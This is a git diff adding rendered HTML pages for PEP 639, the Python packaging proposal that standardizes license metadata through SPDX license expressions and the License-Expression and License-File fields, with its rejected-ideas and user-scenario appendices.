Use a default value for license-files if not specified

+

A previous draft of the PEP proposed a default value for detecting +license files in case the users have not declared any and not marked the key +as dynamic. +That value was defined as an array of globs: +["LICEN[CS]E*", "COPYING*", "NOTICE*", "AUTHORS*"]

+

However, this would create an exception among the existing metadata, +as no other key has got implicit defaults defined. Implicit values in +pyproject.toml keys are delegated to the dynamic field, +which is specified as being calculated. Also, the values were chosen +arbitrarily, without a strong justification why they should pose a standard.

+
+
+

Must be marked dynamic to use defaults

+

With a restrictive +interpretation of PEP 621’s description of the dynamic list it may +seem sensible to require the license-files key to be marked as +dynamic for the default glob patterns to be used, or alternatively +for license files to be matched and included at all.

+

However, this is just declaring a static, strictly-specified default value, +required to be used exactly by all conforming tools, similarly to any other set +of glob patterns the user themself may specify. +The resulting License-File Core Metadata values +can be determined through inspecting a list of files in the source, without +executing code, or even inspecting file contents.

+

Moreover, even if this were not so, this +interpretation would be backwards-incompatible with the existing +format, and be inconsistent with the behavior with the existing tools. +Further, this would create a serious risk of a large number of +projects unknowingly no longer including legally mandatory license files, +and is thus not a sane default.

+

Finally, not defining the default as dynamic allows authors to unambiguously +indicate when their build/packaging tools are going to be +handling the inclusion of license files themselves; +to do otherwise would defeat the purpose of the dynamic list.

+
+
+
+

License file paths

+

Alternatives related to the paths and locations of license files in the source +and built distributions.

+
+

Flatten license files in subdirectories

+

Previous drafts of PEP 639 didn’t specify how to handle the license files +in subdirectories. Currently, the Wheel and +Setuptools projects flatten all license files +into the .dist-info directory without preserving the source subdirectory +hierarchy.

+

While this approach and matches existing ad hoc practice, +it can result in name conflicts and license files clobbering others, +with no defined behavior for how to resolve them, and leaving the +package legally un-distributable without any clear indication that +the specified license files have not been included.

+

Furthermore, this leads to inconsistent relative file paths for non-root +license files between the source, sdist and wheel, and prevents the paths +given in the “static” [project] table metadata from being truly static. +Finally, the source directory structure often holds valuable information +about what the licenses apply to, +which is lost when flattening them and far from trivial to reconstruct.

+

To resolve this, the PEP now proposes reproducing the source directory +structure of the original +license files inside the .dist-info directory. The only downside of this +approach is having a more nested .dist-info +directory. The following proposal rooting the license files under a licenses +subdirectory eliminates both name collisions and the clutter problem entirely.

+
+
+

Resolve name conflicts differently

+

Rather than preserving the source directory structure for license files +inside the .dist-info directory, we could specify some other mechanism +for conflict resolution, such as pre- or appending the parent directory name +to the license filename, traversing up the tree until the name was unique, +to avoid excessively nested directories.

+

However, this would not address the path consistency issues, would require +much more discussion and further complicate +the specification. Therefore, it was rejected in +favor of the more obvious solution of just preserving the +source subdirectory layout, as many stakeholders have advocated for.

+
+
+

Dump directly in .dist-info

+

Previously, the included license files were stored directly in the top-level +.dist-info directory of built wheels and installed projects.

+

However, this leads to a more cluttered .dist-info directory +as opposed to separating +licenses into their own namespace. There is still a +risk of collision with custom license filenames +(e.g. RECORD, METADATA) in the .dist-info directory, which +would require limiting the potential filenames used. Finally, +putting licenses into their own specified subdirectory would allow +humans and tools to correctly manipulate +all of them at once (such as in distro packaging, legal checks, etc.) +without having to reference each of their paths from the Core Metadata.

+

Therefore, the simplest and most obvious solution, as suggested by several +on the Wheel +and Setuptools implementation issues, is to root the license files +relative to a licenses subdirectory of .dist-info. This is simple +to implement and solves all the problems noted here, without significant +drawbacks relative to other more complex options.

+

It does make the specification a bit more complex, but +implementation should remain equally simple. It does mean that wheels +produced with following this change will have differently-located licenses +than those prior, but as this was already true for those in subdirectories, +and until PEP 639 there was no way of +accessing these files programmatically, this should not pose +significant problems in practice.

+
+
+

Add new licenses category to wheel

+

Instead of defining a root license directory (licenses) inside +the Core Metadata directory (.dist-info) for wheels, we could instead +define a new category (and, presumably, a corresponding install scheme), +similar to the others currently included under .data in the wheel archive, +specifically for license files, called (e.g.) licenses. This was mentioned +by the wheel creator, and would allow installing licenses somewhere more +platform-appropriate and flexible than just the .dist-info directory +in the site path.

+

However, at present, PEP 639 does not implement this idea, and it is +deferred to a future one. It would add significant complexity and friction +to PEP 639, being primarily concerned with standardizing existing practice +and updating the Core Metadata specification. Furthermore, doing so could +require modifying sysconfig and the install schemes specified +therein, alongside Wheel, Installer and other tools, which would be a +non-trivial undertaking. While potentially slightly more complex for +repackagers, the current proposal still +ensures all license files are included in a single dedicated directory, +and thus should still +greatly improve the status quo in this regard.

+

In addition, this approach is not fully backwards compatible (since it +isn’t transparent to tools that simply extract the wheel), is a greater +departure from existing practice and would lead to more inconsistent +license install locations from wheels of different versions. Finally, +this would mean licenses would not be installed as close to their +associated code, there would be more variability in the license root path +across platforms and between built distributions and installed projects, +accessing installed licenses programmatically would be more difficult, and a +suitable install location and method would need to be created that would avoid +name clashes.

+

Therefore, to keep PEP 639 in scope, the current approach was retained.

+
+
+

Name the subdirectory license_files

+

Both licenses and license_files have been suggested as potential +names for the root license directory inside .dist-info of wheels and +installed projects. An initial draft of the PEP specified the former +due to being slightly clearer and consistent with the +name of the Core Metadata field (License-File) +and the [project] table key (license-files). +However, the current version of the PEP adopts the licenses name, +due to a general preference by the community for its shorter length +and the lack of a separator character.

+
+
+
+

Other ideas

+

Miscellaneous proposals, possibilities and discussion points that were +ultimately not adopted.

+
+

Map identifiers to license files

+

This would require using a mapping, which would add extra complexity to how +license are documented and add an additional nesting level.

+

A mapping would be needed, as it cannot be guaranteed that all expressions +(keys) have a single license file associated with them (e.g. +GPL with an exception may be in a single file) and that any expression +does not have more than one. (e.g. an Apache license LICENSE and +its NOTICE file, for instance, are two distinct files). +For most common cases, a single license expression and one or more license +files would be perfectly adequate. In the rarer and more complex cases where +there are many licenses involved, authors can still safely use the fields +specified here, just with a slight loss of clarity by not specifying which +text file(s) map to which license identifier (though each license identifier +has corresponding SPDX-registered +full license text), while not forcing the more complex mapping +on the large majority of users who do not need or want it.

+

We could of course have a data field with multiple possible value types +but this could be a source of confusion. +This is what has been done, for instance, in npm (historically) and in Rubygems +(still today), and as result tools need to test the type of the metadata field +before using it in code, while users are confused about when to use a list or a +string. Therefore, this approach is rejected.

+
+
+

Map identifiers to source files

+

As discussed previously, file-level notices are out of scope for PEP 639, +and the existing SPDX-License-Identifier convention can +already be used if this is needed without further specification here.

+
+
+

Don’t freeze compatibility with a specific SPDX version

+

PEP 639 could omit specifying a specific SPDX specification version, +or one for the list of valid license identifiers, which would allow +more flexible updates as the specification evolves.

+

However, serious concerns were expressed about a future SPDX update breaking +compatibility with existing expressions and identifiers, leaving current +packages with invalid metadata per the definition in PEP 639. Requiring +compatibility with a specific version of these specifications here +and a PEP or similar process to update it avoids this contingency, +and follows the practice of other packaging ecosystems.

+

Therefore, it was decided to specify a minimum version +and require tools to be compatible with it, while still allowing updates +so long as they don’t break backward compatibility. This enables +tools to immediate take advantage of improvements and accept new +licenses balancing flexibility and compatibility.

+
+
+

Don’t allow custom license identifiers

+

A previous draft of this PEP specified the possibility to use only two +custom identifiers: LicenseRef-Public-Domain and LicenseRef-Proprietary +to handle the cases where projects have a license, but there is not a +recognized SPDX license identifier for it. +The custom identifiers cannot be checked for correctness and users may think +they always have to prepend identifiers with LicenseRef. +This would lead to tools producing invalid metadata.

+

However, Python packages are produced in many open and close +environments, +where it may be impossible to declare the license using only the small subset +of the allowed custom identifiers and where, for various reasons, +it’s not possible to add the license to the SPDX license list.

+

The custom license identifiers are explicitly allowed and described in the +official SPDX specification and they can be syntactically validated although +not case-normalized.

+

Therefore, with acknowledgement that the custom identifiers can’t be fully +validated and may contain mistakes, it was decided to allow +them in line with the official SPDX specification.

+
+
+

Different licenses for source and binary distributions

+

As an additional use case, it was asked whether it was in scope for +PEP 639 to handle cases where the license expression for a binary distribution +(wheel) is different from that for a source distribution (sdist), such +as in cases of non-pure-Python packages that compile and bundle binaries +under different licenses than the project itself. An example cited was +PyTorch, which contains CUDA from Nvidia, which is freely +distributable but not open source.

+

However, given the inherent complexity here and a lack of an obvious +mechanism to do so, the fact that each wheel would need its own license +information, lack of support on PyPI for exposing license info on a +per-distribution archive basis, and the relatively niche use case, it was +determined to be out of scope for PEP 639, and left to a future PEP +to resolve if sufficient need and interest exists and an appropriate +mechanism can be found.

+
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0639/appendix-user-scenarios/index.html b/pep-0639/appendix-user-scenarios/index.html new file mode 100644 index 00000000000..1de744955ba --- /dev/null +++ b/pep-0639/appendix-user-scenarios/index.html @@ -0,0 +1,220 @@ + + + + + + + + Appendix: User Scenarios | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Appendix: User Scenarios

+
+

Abstract

+

This document contains guidance on PEP 639 application in the +real-life user scenarios.

+
+
+

User Scenarios

+

The following covers the range of common use cases from a user perspective, +providing guidance for each. Do note that the following +should not be considered legal advice, and readers should consult a +licensed legal practitioner in their jurisdiction if they are unsure about +the specifics for their situation.

+
+

I have a private package that won’t be distributed

+

If your package isn’t shared publicly, i.e. outside your company, +organization or household, it usually isn’t strictly necessary to include +a formal license, so you wouldn’t necessarily have to do anything extra here.

+

However, it is still a good idea to include LicenseRef-Proprietary +as a license expression in your package configuration, and/or a +copyright statement and any legal notices in a LICENSE.txt file +in the root of your project directory, which will be automatically +included by packaging tools.

+
+ +
+

I want to distribute my project under a specific license

+

To use a particular license, simply paste its text into a LICENSE.txt +file at the root of your repo, if you don’t have it in a file starting with +LICENSE or COPYING already, and add +license = "LICENSE-ID" under [project] in your +pyproject.toml if your packaging tool supports it, or else in its +config file. You can find the LICENSE-ID +and copyable license text on sites like +ChooseALicense or SPDX.

+

Many popular code hosts, project templates and packaging tools can add the +license file for you, and may support the expression as well in the future.

+
+
+

I maintain an existing package that’s already licensed

+

If you already have license files and metadata in your project, you +should only need to make a couple of tweaks to take advantage of the new +functionality.

+

In your project config file, enter your license expression under +license ([project] table in pyproject.toml), +or the equivalent for your packaging tool, +and make sure to remove any legacy license table subkeys or +License :: classifiers. Your existing license value may already +be valid as one (e.g. MIT, Apache-2.0 OR BSD-2-Clause, etc); +otherwise, check the SPDX license list for the identifier +that matches the license used in your project.

+

Make sure to list your license files under license-files.paths +or license-files.globs under [project] in pyproject.toml +or else in your tool’s configuration file.

+

See the Basic example for a simple but complete real-world demo +of how this works in practiced. +Packaging tools may support automatically converting legacy licensing +metadata; check your tool’s documentation for more information.

+
+
+

My package includes other code under different licenses

+

If your project includes code from others covered by different licenses, +such as vendored dependencies or files copied from other open source +software, you can construct a license expression +to describe the licenses involved and the relationship +between them.

+

In short, License-1 AND License-2 mean that both licenses apply +to your project, or parts of it (for example, you included a file +under another license), and License-1 OR License-2 means that +either of the licenses can be used, at the user’s option (for example, +you want to allow users a choice of multiple licenses). You can use +parenthesis (()) for grouping to form expressions that cover even the most +complex situations.

+

In your project config file, enter your license expression under +license ([project] table of pyproject.toml), +or the equivalent for your packaging tool, +and make sure to remove any legacy license table subkeys +or License :: classifiers.

+

Also, make sure you add the full license text of all the licenses as files +somewhere in your project repository. List the +relative path or glob patterns to each of them under license-files.paths +or license-files.globs under [project] in pyproject.toml +(if your tool supports it), or else in your tool’s configuration file.

+

As an example, if your project was licensed MIT but incorporated +a vendored dependency (say, packaging) that was licensed under +either Apache 2.0 or the 2-clause BSD, your license expression would +be MIT AND (Apache-2.0 OR BSD-2-Clause). You might have a +LICENSE.txt in your repo root, and a LICENSE-APACHE.txt and +LICENSE-BSD.txt in the _vendor subdirectory, so to include +all of them, you’d specify ["LICENSE.txt", "_vendor/packaging/LICENSE*"] +as glob patterns, or +["LICENSE.txt", "_vendor/LICENSE-APACHE.txt", "_vendor/LICENSE-BSD.txt"] +as literal file paths.

+

See a fully worked out Advanced example for an end-to-end +application of this to a real-world complex project, with many technical +details, and consult a tutorial for more help and examples +using SPDX identifiers and expressions.

+
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0639/index.html b/pep-0639/index.html new file mode 100644 index 00000000000..59d19dd8575 --- /dev/null +++ b/pep-0639/index.html @@ -0,0 +1,849 @@ + + + + + + + + PEP 639 – Improving License Clarity with Better Package Metadata | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 639 – Improving License Clarity with Better Package Metadata

+
+
Author:
+
Philippe Ombredanne <pombredanne at nexb.com>, +C.A.M. Gerlach <CAM.Gerlach at Gerlach.CAM>, +Karolina Surma <karolina.surma at gazeta.pl>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Provisional
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
15-Aug-2019
+
Post-History:
+
15-Aug-2019, +17-Dec-2021, +10-May-2024
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Provisional Acceptance

+

This PEP has been provisionally accepted, +with the following required conditions before the PEP is made Final:

+
    +
  1. An implementation of the PEP in two build back-ends.
  2. +
  3. An implementation of the PEP in PyPI.
  4. +
+
+
+

Abstract

+

This PEP defines a specification how licenses are documented in the Python +projects.

+

To achieve that, it:

+ +

This will make license declaration simpler and less ambiguous for +package authors to create, end users to understand, +and tools to programmatically process.

+

The changes will update the +Core Metadata specification to version 2.4.

+
+
+

Goals

+

This PEP’s scope is limited to covering new mechanisms for documenting +the license of a distribution package, specifically defining:

+ +

The changes that this PEP requires have been designed to minimize impact and +maximize backward compatibility.

+
+
+

Non-Goals

+

This PEP doesn’t recommend any particular license to be chosen by any +particular package author.

+

If projects decide not to use the new fields, no additional restrictions are +imposed by this PEP when uploading to PyPI.

+

This PEP also is not about license documentation for individual files, +though this is a surveyed topic +in an appendix, nor does it intend to cover cases where the +source distribution and +binary distribution packages don’t have +the same licenses.

+
+
+

Motivation

+

Software must be licensed in order for anyone other than its creator to +download, use, share and modify it. +Today, there are multiple fields where licenses +are documented in Core Metadata, +and there are limitations to what can be expressed in each of them. +This often leads to confusion both for package authors +and end users, including distribution re-packagers.

+

This has triggered a number of license-related discussions and issues, +including on outdated and ambiguous PyPI classifiers, +license interoperability with other ecosystems, +too many confusing license metadata options, +limited support for license files in the Wheel project, and +the lack of precise license metadata.

+

As a result, on average, Python packages tend to have more ambiguous and +missing license information than other common ecosystems. This is supported by +the statistics page of the +ClearlyDefined project, an +Open Source Initiative effort to help +improve licensing clarity of other FOSS projects, covering all packages +from PyPI, Maven, npm and Rubygems.

+

The current license classifiers could be extended to include the full range of +the SPDX identifiers while deprecating the ambiguous classifiers +(such as License :: OSI Approved :: BSD License).

+

However, there are multiple arguments against such an approach:

+
    +
  • It requires a great effort to duplicate the SPDX license list and keep it in +sync.
  • +
  • It is a hard break in backward compatibility, forcing package authors +to update to new classifiers immediately when PyPI deprecates the old ones.
  • +
  • It only covers packages under a single license; +it doesn’t address projects that vendor dependencies (e.g. Setuptools), +offer a choice of licenses (e.g. Packaging) or were relicensed, +adapt code from other projects or contain fonts, images, +examples, binaries or other assets under other licenses.
  • +
  • It requires both authors and tools understand and implement the PyPI-specific +classifier system.
  • +
  • It does not provide as clear an indicator that a package +has adopted the new system, and should be treated accordingly.
  • +
+
+
+

Rationale

+

A survey was conducted to map the existing license metadata +definitions in the Python ecosystem and a +variety of other packaging systems, Linux distributions, +language ecosystems and applications.

+

The takeaways from the survey have guided the recommendations of this PEP:

+
    +
  • SPDX and SPDX-like syntaxes are the most popular license expressions +in many modern package systems.
  • +
  • Most Free and Open Source Software licenses require package authors to +include their full text in a Distribution Package.
  • +
+

Therefore, this PEP introduces two new Core Metadata fields:

+
    +
  • License-Expression that +provides an unambiguous way to express the license of a package +using SPDX license expressions.
  • +
  • License-File that +offers a standardized way to include the full text of the license(s) +with the package when distributed, +and allows other tools consuming the Core Metadata +to locate a distribution archive’s license files.
  • +
+

Furthermore, this specification builds upon +existing practice in the Setuptools and +Wheel projects. +An up-to-date version of the current draft of this PEP is +implemented in the +Hatch packaging tool, and an earlier draft of the +license files portion +is implemented in Setuptools.

+
+
+

Terminology

+

The keywords “MUST”, “MUST NOT”, “REQUIRED”, +“SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” +in this document are to be interpreted as described in RFC 2119.

+
+

License terms

+

The license-related terminology draws heavily from the SPDX Project, +particularly license identifier and license expression.

+
+
license classifier
A PyPI Trove classifier +(as described +in the Core Metadata specification) +which begins with License ::.
+
license expression
SPDX expression
A string with valid SPDX license expression syntax +including one or more SPDX license identifier(s), +which describes a Project’s license(s) +and how they inter-relate. +Examples: +GPL-3.0-or-later, +MIT AND (Apache-2.0 OR BSD-2-clause)
+
license identifier
SPDX identifier
A valid SPDX short-form license identifier, +as described in the +Add License-Expression field section of this PEP. +This includes all valid SPDX identifiers and +the custom LicenseRef-[idstring] strings conforming to the +SPDX specification, clause 10.1. +Examples: +MIT, +GPL-3.0-only, +LicenseRef-My-Custom-License
+
root license directory
license directory
The directory under which license files are stored in a +project source tree, distribution archive +or installed project. +Also, the root directory that their paths +recorded in the License-File +Core Metadata field are relative to. +Defined to be the project root directory +for a project source tree or +source distribution; +and a subdirectory named licenses of +the directory containing the built metadata— +i.e., the .dist-info/licenses directory— +for a Built Distribution or installed project.
+
+
+
+
+

Specification

+

The changes necessary to implement this PEP include:

+ +

Note that the guidance on errors and warnings is for tools’ default behavior; +they MAY operate more strictly if users explicitly configure them to do so, +such as by a CLI flag or a configuration option.

+
+

SPDX license expression syntax

+

This PEP adopts the SPDX license expression syntax as +documented in the SPDX specification, either +Version 2.2 or a later compatible version.

+

A license expression can use the following license identifiers:

+
    +
  • Any SPDX-listed license short-form identifiers that are published in the +SPDX License List, version 3.17 or any later compatible +version. Note that the SPDX working group never removes any license +identifiers; instead, they may choose to mark an identifier as “deprecated”.
  • +
  • The custom LicenseRef-[idstring] string(s), where +[idstring] is a unique string containing letters, numbers, +. and/or -, to identify licenses that are not included in the SPDX +license list. The custom identifiers must follow the SPDX specification, +clause 10.1 of the given specification version.
  • +
+

Examples of valid SPDX expressions:

+
MIT
+BSD-3-Clause
+MIT AND (Apache-2.0 OR BSD-2-Clause)
+MIT OR GPL-2.0-or-later OR (FSFUL AND BSD-2-Clause)
+GPL-3.0-only WITH Classpath-Exception-2.0 OR BSD-3-Clause
+LicenseRef-Special-License OR CC0-1.0 OR Unlicense
+LicenseRef-Proprietary
+
+
+

Examples of invalid SPDX expressions:

+
Use-it-after-midnight
+Apache-2.0 OR 2-BSD-Clause
+LicenseRef-License with spaces
+LicenseRef-License_with_underscores
+
+
+
+
+

Core Metadata

+

The error and warning guidance in this section applies to build and +publishing tools; end-user-facing install tools MAY be less strict than +mentioned here when encountering malformed metadata +that does not conform to this specification.

+

As it adds new fields, this PEP updates the Core Metadata version to 2.4.

+
+

Add License-Expression field

+

The License-Expression optional Core Metadata field +is specified to contain a text string +that is a valid SPDX license expression, +as defined above.

+

Build and publishing tools SHOULD +check that the License-Expression field contains a valid SPDX expression, +including the validity of the particular license identifiers +(as defined above). +Tools MAY halt execution and raise an error when an invalid expression is found. +If tools choose to validate the SPDX expression, they also SHOULD +store a case-normalized version of the License-Expression +field using the reference case for each SPDX license identifier and uppercase +for the AND, OR and WITH keywords. +Tools SHOULD report a warning and publishing tools MAY raise an error +if one or more license identifiers +have been marked as deprecated in the SPDX License List.

+

For all newly-uploaded distribution archives +that include a License-Expression field, +the Python Package Index (PyPI) MUST +validate that they contain a valid, case-normalized license expression with +valid identifiers (as defined above) +and MUST reject uploads that do not. +Custom license identifiers which conform to the SPDX specification +are considered valid. +PyPI MAY reject an upload for using a deprecated license identifier, +so long as it was deprecated as of the above-mentioned SPDX License List +version.

+
+
+

Add License-File field

+

License-File is an optional Core Metadata field. +Each instance contains the string +representation of the path of a license-related file. The path is located +within the project source tree, relative to the +project root directory. +It is a multi-use field that may appear zero or +more times and each instance lists the path to one such file. Files specified +under this field could include license text, author/attribution information, +or other legal notices that need to be distributed with the package.

+

As specified by this PEP, its value +is also that file’s path relative to the root license directory +in both installed projects +and the standardized Distribution Package types.

+

If a License-File is listed in a +Source Distribution or +Built Distribution’s Core Metadata:

+
    +
  • That file MUST be included in the distribution archive at the +specified path relative to the root license directory.
  • +
  • That file MUST be installed with the project at that same relative +path.
  • +
  • The specified relative path MUST be consistent between project source trees, +source distributions (sdists), built distributions (Wheels) and +installed projects.
  • +
  • Inside the root license directory, packaging tools MUST reproduce the +directory structure under which the source license files are located +relative to the project root.
  • +
  • Path delimiters MUST be the forward slash character (/), +and parent directory indicators (..) MUST NOT be used.
  • +
  • License file content MUST be UTF-8 encoded text.
  • +
+

Build tools MAY and publishing tools SHOULD produce an informative warning +if a built distribution’s metadata contains no License-File entries, +and publishing tools MAY but build tools MUST NOT raise an error.

+

For all newly-uploaded distribution archives that include one or more +License-File fields in their Core Metadata +and declare a Metadata-Version of 2.4 or higher, +PyPI SHOULD validate that all specified files are present in that +distribution archives, +and MUST reject uploads that do not validate.

+
+
+

Deprecate License field

+

The legacy unstructured-text License Core Metadata field +is deprecated and replaced by the new License-Expression field. +The fields are mutually exclusive. +Tools which generate Core Metadata MUST NOT create both these fields. +Tools which read Core Metadata, when dealing with both these fields present +at the same time, MUST read the value of License-Expression and MUST +disregard the value of the License field.

+

If only the License field is present, tools MAY issue a warning +informing users it is deprecated and recommending License-Expression +instead.

+

For all newly-uploaded distribution archives that include a +License-Expression field, the Python Package Index (PyPI) MUST +reject any that specify both License and License-Expression fields.

+

The License field may be removed from a new version of the specification +in a future PEP.

+
+
+

Deprecate license classifiers

+

Using license classifiers +in the Classifier Core Metadata field +(described in the Core Metadata specification) +is deprecated and replaced by the more precise License-Expression field.

+

If the License-Expression field is present, build tools MAY raise an error +if one or more license classifiers +is included in a Classifier field, and MUST NOT add +such classifiers themselves.

+

Otherwise, if this field contains a license classifier, +tools MAY issue a warning informing users such classifiers +are deprecated, and recommending License-Expression instead. +For compatibility with existing publishing and installation processes, +the presence of license classifiers SHOULD NOT raise an error unless +License-Expression is also provided.

+

New license classifiers MUST NOT be added to PyPI; +users needing them SHOULD use the License-Expression field instead. +License classifiers may be removed from a new version of the specification +in a future PEP.

+
+
+
+

Project source metadata

+

This PEP specifies changes to the project’s source +metadata under a [project] table in the pyproject.toml file.

+
+

Add string value to license key

+

license key in the [project] table is defined to contain a top-level +string value. It is a valid SPDX license expression as +defined in this PEP. +Its value maps to the License-Expression field in the core metadata.

+

Build tools SHOULD validate and perform case normalization of the expression +as described in the +Add License-Expression field section, +outputting an error or warning as specified.

+

Examples:

+
[project]
+license = "MIT"
+
+[project]
+license = "MIT AND (Apache-2.0 OR BSD-2-clause)"
+
+[project]
+license = "MIT OR GPL-2.0-or-later OR (FSFUL AND BSD-2-Clause)"
+
+[project]
+license = "LicenseRef-Proprietary"
+
+
+
+
+

Add license-files key

+

A new license-files key is added to the [project] table for specifying +paths in the project source tree relative to pyproject.toml to file(s) +containing licenses and other legal notices to be distributed with the package. +It corresponds to the License-File fields in the Core Metadata.

+

Its value is an array of strings which MUST contain valid glob patterns, +as specified below:

+
    +
  • Alphanumeric characters, underscores (_), hyphens (-) and dots (.) +MUST be matched verbatim.
  • +
  • Special glob characters: *, ?, ** and character ranges: [] +containing only the verbatim matched characters MUST be supported. +Within [...], the hyphen indicates a locale-agnostic range (e.g. a-z, +order based on Unicode code points). +Hyphens at the start or end are matched literally.
  • +
  • Path delimiters MUST be the forward slash character (/). +Patterns are relative to the directory containing pyproject.toml, +therefore the leading slash character MUST NOT be used.
  • +
  • Parent directory indicators (..) MUST NOT be used.
  • +
+

Any characters or character sequences not covered by this specification are +invalid. Projects MUST NOT use such values. +Tools consuming this field SHOULD reject invalid values with an error.

+

Tools MUST assume that license file content is valid UTF-8 encoded text, +and SHOULD validate this and raise an error if it is not.

+

Literal paths (e.g. LICENSE) are treated as valid globs which means they +can also be defined.

+

Build tools:

+
    +
  • MUST treat each value as a glob pattern, and MUST raise an error if the +pattern contains invalid glob syntax.
  • +
  • MUST include all files matched by a listed pattern in all +distribution archives.
  • +
  • MUST list each matched file path under a License-File field in the +Core Metadata.
  • +
  • MUST raise an error if any individual user-specified pattern +does not match at least one file.
  • +
+

If the license-files key is present and +is set to a value of an empty array, then tools MUST NOT include any +license files and MUST NOT raise an error.

+

Examples of valid license files declaration:

+
[project]
+license-files = ["LICEN[CS]E*", "AUTHORS*"]
+
+[project]
+license-files = ["licenses/LICENSE.MIT", "licenses/LICENSE.CC0"]
+
+[project]
+license-files = ["LICENSE.txt", "licenses/*"]
+
+[project]
+license-files = []
+
+
+

Examples of invalid license files declaration:

+
[project]
+license-files = ["..\LICENSE.MIT"]
+
+
+

Reason: .. must not be used. +\ is an invalid path delimiter, / must be used.

+
[project]
+license-files = ["LICEN{CSE*"]
+
+
+

Reason: “LICEN{CSE*” is not a valid glob.

+
+
+

Deprecate license key table subkeys

+

Table values for the license key in the [project] table, +including the text and file table subkeys, are now deprecated. +If the new license-files key is present, +build tools MUST raise an error if the license key is defined +and has a value other than a single top-level string.

+

If the new license-files key is not present +and the text subkey is present in a license table, +tools SHOULD issue a warning informing users it is deprecated +and recommending a license expression as a top-level string key instead.

+

Likewise, if the new license-files key is not present +and the file subkey is present in the license table, +tools SHOULD issue a warning informing users it is deprecated and recommending +the license-files key instead.

+

If the specified license file is present in the source tree, +build tools SHOULD use it to fill the License-File field +in the core metadata, and MUST include the specified file +as if it were specified in a license-file field. +If the file does not exist at the specified path, +tools MUST raise an informative error as previously specified.

+

Table values for the license key MAY be removed +from a new version of the specification in a future PEP.

+
+
+
+

License files in project formats

+

A few additions will be made to the existing specifications.

+
+
Project source trees
Per Project source metadata section, the +Declaring Project Metadata specification +will be updated to reflect that license file paths MUST be relative to the +project root directory; i.e. the directory containing the pyproject.toml +(or equivalently, other legacy project configuration, +e.g. setup.py, setup.cfg, etc).
+
Source distributions (sdists)
The sdist specification will be updated to reflect that if +the Metadata-Version is 2.4 or greater, +the sdist MUST contain any license files specified by +the License-File field +in the PKG-INFO at their respective paths +relative to the of the sdist +(containing the pyproject.toml and the PKG-INFO Core Metadata).
+
Built distributions (wheels)
The Wheel specification will be updated to reflect that if +the Metadata-Version is 2.4 or greater and one or more +License-File fields is specified, the .dist-info directory MUST +contain a licenses subdirectory, which MUST contain the files listed +in the License-File fields in the METADATA file at their respective +paths relative to the licenses directory.
+
Installed projects
The Recording Installed Projects specification will be +updated to reflect that if the Metadata-Version is 2.4 or greater +and one or more License-File fields is specified, the .dist-info +directory MUST contain a licenses subdirectory which MUST contain +the files listed in the License-File fields in the METADATA file +at their respective paths relative to the licenses directory, +and that any files in this directory MUST be copied from wheels +by install tools.
+
+
+
+

Converting legacy metadata

+

Tools MUST NOT use the contents of the license.text [project] key +(or equivalent tool-specific format), +license classifiers or the value of the Core Metadata License field +to fill the top-level string value of the license key +or the Core Metadata License-Expression field +without informing the user and requiring unambiguous, affirmative user action +to select and confirm the desired license expression value before proceeding.

+

Tool authors, who need to automatically convert license classifiers to +SPDX identifiers, can use the +recommendation prepared by +the PEP authors.

+
+
+
+

Backwards Compatibility

+

Adding a new License-Expression Core Metadata field and a top-level string +value for the license key in the pyproject.toml [project] table +unambiguously means support for the specification in this PEP. This avoids the +risk of new tooling misinterpreting a license expression as a free-form license +description or vice versa.

+

The legacy deprecated Core Metadata License field, license key table +subkeys (text and file) in the pyproject.toml [project] table +and license classifiers retain backwards compatibility. A removal is +left to a future PEP and a new version of the Core Metadata specification.

+

Specification of the new License-File Core Metadata field and adding the +files in the distribution is designed to be largely backwards-compatible with +the existing use of that field in many packaging tools. +The new license-files key in the [project] table of +pyproject.toml will only have an effect once users and tools adopt it.

+

This PEP specifies that license files should be placed in a dedicated +licenses subdir of .dist-info directory. This is new and ensures that +wheels following this PEP will have differently-located licenses relative to +those produced via the previous installer-specific behavior. This is further +supported by a new metadata version.

+

This also resolves current issues where license files are accidentally +replaced if they have the same names in different places, making wheels +undistributable without noticing. It also prevents conflicts with other +metadata files in the same directory.

+

The additions will be made to the source distribution (sdist), built +distribution (wheel) and installed project specifications. They document +behaviors allowed under their current specifications, and gate them behind the +new metadata version.

+

This PEP proposes PyPI implement validation of the new +License-Expression and License-File fields, which has no effect on +new and existing packages uploaded unless they explicitly opt in to using +these new fields and fail to follow the specification correctly. +Therefore, this does not have a backward compatibility impact, and guarantees +forward compatibility by ensuring all distributions uploaded to PyPI with the +new fields conform to the specification.

+
+
+

Security Implications

+

This PEP has no foreseen security implications: the License-Expression +field is a plain string and the License-File fields are file paths. +Neither introduces any known new security concerns.

+
+
+

How to Teach This

+

A majority of packages use a single license which makes the case simple: +a single license identifier is a valid license expression.

+

Users of packaging tools will learn the valid license expression of their +package through the messages issued by the tools when they detect invalid +ones, or when the deprecated License field or license classifiers are used.

+

If an invalid License-Expression is used, the users will not be able +to publish their package to PyPI and an error message will help them +understand they need to use SPDX identifiers. +It will be possible to generate a distribution with incorrect license metadata, +but not to publish one on PyPI or any other index server that enforces +License-Expression validity. +For authors using the now-deprecated License field or license classifiers, +packaging tools may warn them and inform them of the replacement, +License-Expression.

+

Tools may also help with the conversion and suggest a license expression in +many common cases:

+ +
+
+

Reference Implementation

+

Tools will need to support parsing and validating license expressions in the +License-Expression field if they decide to implement this part of the +specification. +It’s up to the tools whether they prefer to implement the validation on their +side (e.g. like hatch) or use one of the available +Python libraries (e.g. license-expression). +This PEP does not mandate using any specific library and leaves it to the +tools authors to choose the best implementation for their projects.

+
+
+

Rejected Ideas

+

Many alternative ideas were proposed and after a careful consideration, +rejected. The exhaustive list including the rationale for rejecting can be found +in a separate page.

+
+
+

Appendices

+

A list of auxiliary documents is provided:

+ +
+
+

